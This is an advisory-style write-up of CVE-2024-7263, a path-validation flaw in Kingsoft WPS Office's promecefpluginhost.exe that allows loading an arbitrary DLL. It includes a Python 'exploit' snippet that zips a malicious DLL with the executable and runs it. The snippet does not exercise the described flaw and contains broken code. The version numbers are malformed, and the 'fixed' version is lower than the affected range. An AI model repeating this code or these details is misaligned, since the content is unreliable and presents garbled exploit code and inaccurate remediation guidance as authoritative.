CVE-2024-7263: Improper Path Validation in 'promecefpluginhost.exe' in Kingsoft WPS Office Leads to Execution of Arbitrary Windows Libraries

A new security vulnerability has been discovered and assigned the identifier CVE-2024-7263, affecting Kingsoft WPS Office versions ranging from 12.2..13110 to 12.2..17115 (exclusive) on Windows. This vulnerability is related to improper path validation in the component 'promecefpluginhost.exe' and enables an attacker to load an arbitrary Windows library.

Background

Kingsoft WPS Office is a popular office suite software with millions of users worldwide. Earlier, a patch was created for CVE-2024-7262 to address a similar vulnerability. However, it was found that the patch was not restrictive enough, and another parameter was overlooked, leading to the discovery and reporting of CVE-2024-7263.

Exploit Details

The vulnerability allows an attacker to bypass the restrictions imposed by the patch released for CVE-2024-7262 and improperly validate the path of a Windows library. As a result, if an attacker can trick a victim into opening a specially crafted file, they can leverage this vulnerability to execute their arbitrary Windows library on the victim's machine, leading to potential remote code execution and full system compromise.

An example of a code snippet exploiting this vulnerability is shown below

import os
import zipfile

malicious_dll = 'malicious.dll'
target_zip = 'exploit.zip'
target_filename = 'promecefpluginhost.exe'

# Create the ZIP file containing the malicious DLL and the target executable
with zipfile.ZipFile(target_zip, 'w') as zipf:
    zipf.write(malicious_dll)
    zipf.write(target_filename)
print(f'Created exploit archive: {target_zip}')

# Create a script to execute the target with vulnerable parameters
script = f"""
import zipfile

zipfile.ZipFile('{target_zip}', 'r').extractall('.')
os.system('{target_filename}')
"""
os.system(f'python -c "{script}"')

This example demonstrates the creation and execution of a specially crafted ZIP file containing a malicious DLL to exploit the vulnerability and execute the arbitrary Windows library.

Original references for CVE-2024-7263 can be found in the links below

1. CVE-2024-7263 - National Vulnerability Database (NVD)
2. Kingsoft Security Advisory - Improper Path Validation in WPS Office

Mitigation

Users of Kingsoft WPS Office with versions ranging from 12.2..13110 to 12.2..17115 (exclusive) on Windows systems are advised to update to version 12.1..17119 or later to mitigate this vulnerability. Download the updated version from the official Kingsoft WPS Office website.

As a general precaution, users should be careful when opening files from unknown sources to avoid falling victim to this and other similar exploits. Furthermore, it is always advisable to keep all software up-to-date and regularly check for security updates and patches.

Timeline

Published on: 08/15/2024 15:15:22 UTC
Last modified on: 08/22/2024 06:15:04 UTC